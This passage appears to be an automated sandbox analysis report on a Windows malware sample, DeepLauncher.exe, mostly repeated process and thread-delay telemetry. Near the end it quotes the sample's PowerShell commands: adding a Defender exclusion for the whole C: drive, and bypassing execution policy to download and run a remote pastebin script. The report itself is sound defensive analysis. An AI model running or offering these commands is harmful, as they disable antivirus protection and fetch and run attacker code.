Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DeepLauncher.exeMemory allocated: 1F32EEB0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DeepLauncher.exeWindow / User API: threadDelayed 1550Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7921Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 615Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5647Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 436Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7410
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 7921 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 615 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 7249 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 5647 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 436 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 7410 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 2109 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD6D9000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1738079879.00000233CD6CA000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD692000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1734769390.00000233CD642000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1605965932.000002411B372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\DeepLauncher.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFB13633843Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFB13633843Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
